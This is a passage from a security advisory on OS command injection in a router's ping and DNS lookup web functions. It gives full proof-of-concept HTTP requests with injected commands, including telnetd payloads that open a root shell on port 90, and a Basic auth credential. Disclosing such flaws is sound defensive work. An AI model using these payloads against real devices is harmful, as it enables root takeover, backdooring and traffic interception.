Description
-----------
The ping function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system as the root user.
Proof of concept
----------------
Example exploitation to obtain a file and directory listing:
POST /ping.cgi HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Content-Length: 81
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YXBwbGU3ODE=
Origin:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer:
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls
To get an interactive shell,
1. Send the following POST data:
IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
2. Telnet to port 90
Solution
--------
Validate untrusted user input using a whitelist of acceptable values. For example, IPv4 address values may only include the digits '0' through '9', and full stops ('.')
3. Blind Command Execution with DNS Lookup
===========================================
Requires
--------
Authenticated access to the web administration interface.
Description
-----------
The DNS lookup function available through the web interface is vulnerable to operating system command injection. An attacker with authenticated web user access can gain OS command execution privileges which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
Impact
------
Using this vulnerability, BAE Systems was able to execute arbitrary commands on the underlying Linux operating system but was unable to see the response.
Proof of concept
----------------
Example exploitation demonstrating the issue through use of the ‘sleep’ command to delay the response from the server:
POST /dnslookup.cgi HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Content-Length: 32
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YXBwbGU3ODE=
Origin:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer:
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
host_name=|sleep 5&lookup=Lookup
To get an interactive shell,
1. Send the following POST data:
hostname=|/usr/sbin/telnetd -p 90 -l /bin/sh&lookup=Lookup
2. Telnet to port 90